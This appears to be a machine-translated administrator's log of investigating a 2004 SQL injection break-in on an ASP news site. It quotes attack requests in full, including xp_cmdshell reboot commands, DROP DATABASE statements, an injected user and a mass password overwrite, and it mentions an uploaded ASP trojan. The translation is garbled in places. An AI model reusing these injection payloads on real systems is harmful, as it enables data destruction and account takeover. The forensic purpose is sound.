Time: 13:30 noon
Received the laboratory phone, saying that the website information distribution system (old version) users cannot log in and see that all usernames and passwords have been changed to Admin and do not find other changes.
After analysis, the database is illegally modified. Because the username is set to the primary key, it will not be repeated under normal conditions.
Time: 15:30 in the afternoon
Go to the laboratory to view the server. The server system is Win2003 IIS6.0, and the system is written in ASP, the database is SQL-Server 2000. Restore the user table with a backup. Look at the system security log, discover the following records: 2004-09-08 03:32:20 get /news/showmsg.asp ID = 1190% 20and% 20exists (select% 20 *% 20FROM% 20Admin) | 24 | 80040E37 | [Microsoft ] [ODBC_SQL_SERVER_DRIVER] [SQL_Server] object name _'Admin'_ is invalid. 80 - 211.157.253.134 500 Systems There is SQL injection vulnerability! Intrusion in guessing the user form, finding the operation records of 211.157.253.134, it has only been many times, and guess: 2004-09-08 03:32:31 get /news/showmsg.asp ID = 1190% 20and% 20Exists (Select% 20 *% 20FROM% 20User) | 24 | 80040E14 | [Microsoft] [odbc_sql_server_driver] [SQL_SERVER] has a speech near keyword _'User'_. 80 - 211.157.253.134 500 Let's start doing actions, continue to see 2004-09-08 03:33:58 get /news/showmsg.asp ID = 1190% 20and% 20Exists (select% 20 *% 20FROM% 20News) | 24 | 80040E37 | [Microsoft] [ODBC_SQL_SERVER_DRIVER] [SQL_SERVER] object name _'news'_ invalid. 80 - 211.157.253.134 500 also guess several information tables, but also a good deeds, eventually did not guess. 2004-09-08 03:36:01 get /news/showmsg.asp ID = 1190; EXEC% 20XP_cmdshell% 20'iisReset% 20 / Reboot% 20 / now '| 194 | 80004005 | [Microsoft] [odbc_sql_server_driver] [SQL_Server ] Failed to find the stored procedure _'Xp_cmdshell '. 80 - 211.157.253.134 500ID = 1190; EXEC% 20dBo.master.xp_cmdshell% 20'iisreset% 20 / Reboot% 20 / Now '| 194 | 80004005 | [Microsoft] [odbc_sql_server_driver] [SQL_SERVER] failed to _sysDatabases_ Find the entry corresponding to the database _'DBO'_. No entries with this name are found. Make sure the name is entered correctly. 80 - 211.157.253.134 5002004-09-08 03:37:33 get /news/showmsg.asp ID = 1190; EXEC% 20master.xp_cmdshell% 20'iisreset% 20 / Reboot% 20 / now | 194 | 80004005 | Microsoft] [ODBC_SQL_SERVER_DRIVER] [SQL_SERVER] Failed to find the stored procedure _'master.xp_cmdshell '. 80 - 211.157.253.134 500 OK OK After some processing, some extension stored procedures have been deleted.
I also guess a few messages, I didn't guess, I finally started to do it: 2004-09-08 03:38:55 get /news/showmsg.asp id = 1190; select% 20 *% 20FROM% 20 [user]; 80 - 211.157.253.134 2002004-09-08 03:47:31 get /news/showmsg.asp ID = 1190% 20And% 20Drop% 20Databases% 20t *** s | 24 | 80040E14 | [Microsoft] [ODBC_SQL_SERVER_DRIVER] [SQL_Server ] There is a syntax error near keyword_nrop'_. 80 - 211.157.253.134 500 Guess the database name, but also delete the database, sinister! 2004-09-08 03:47:46 get /news/showmsg.asp ID = 1190% 20;% 20Drop% 20Database% 20Trans; - | 194 | 80004005 | [Microsoft] [odbc_sql_server_driver] [SQL_Server] unable to remove _ database _n *** s' because it is currently being used. 80 - 211.157.253.134 500 In use, cannot be deleted. . . 2004-09-08 03:50:33 get /news/showmsg.asp ID = 1190% 20; DROP% 20Database% 20master; | 194 | 80004005 | [Microsoft] [odbc_sql_server_driver] [SQL_Server] unable to _ Remove _ Database_ ' Master 'because it is a system_Dermination. 80 - 211.157.253.134 500, I want to delete 2004-09-08 03:56:18 get /news/showmsg.asp ID = 1190% 20; INSERT% 20InTo% 20 [user] (username, [password]) % 20VALUES ('123123', '123123'); 80 - 211.157.253.134 200 To build a user 2004-09-08 03:57:36 get /news/showmsg.asp ID = 1190% 20; delete% 20FROM% 20 [User]% 20where% 20Username = '123123'; | 24 | 80040E14 | [Microsoft] [odbc_sql_server_driver] [SQL_Server] second _1_ line: _ ';' _ vicinity has a speech error. 80 - 211.157.253.134 500 To delete this user, what do you mean, is it not used? Continue to see: 2004-09-08 03:58:12 Get /news/showmsg.asp ID = 1190% 20; UPDATE% 20 [user]% 20set% 20Username = 'admin', password = 'admin'% 20where% 20ID = 1; | 24 | 80040E14 | [Microsoft] [ODBC_SQL_SERVER_DRIVER] [SQL_Server] column name _'ID'_ invalid.
80 - 211.157.253.134 500 To change the administrator password, also column name is not 2004-09-08 03:58:43 get /news/showmsg.asp ID = 1190% 20; UPDATE% 20 [user]% 20set% 20USERNAME = 'admin'; 80 - 211.157.253.134 2002004-09-08 03:58:55 get /news/showmsg.asp ID = 1190% 20; UPDATE% 20 [user]% 20set% 20 [password] = 'admin' , 80 - 211.157.253.134 200 It turns out that all username, password changed 2004-09-08 03:59:07 get /news/msg_list.asp - 80 - 211.157.253.134 200 Already logged in to management interface, For what you want, but it is more moral, no contents of the database. 2004-09-08 04:01:56 get /news/showmsg.asp ID = 1190% 20; DROP% 20Database% 20eaie; | 194 | 80004005 | [Microsoft] [odbc_sql_server_driver] [SQL_Server] unable to _ Remove _ Database_ ' Eaie 'because it does not exist in the system directory. 80 - 211.157.253.134 500eaie? ? ? 2004-09-08 04:10:22 Post /news/saveupfile.asp - 80 - 211.157.253.134 200 What should be uploaded, see: 2004-09-08 04:11:12 Get / news / upfile / 200498121011admin1. ASP - 80 - 211.157.253.134 200 uploaded * .asp files, logged in with admin user, and executed. 2004-09-08 04:49:15 get /news/upfile/200498121011admin1.asp path = c: / documents% 20 - 211.157.253.134 200 Execute a lot of similar operations, estimated is Trojan . Log analysis is completed. Time: 17:00 in the afternoon, look at what files uploaded, open, have a line to explain everything:
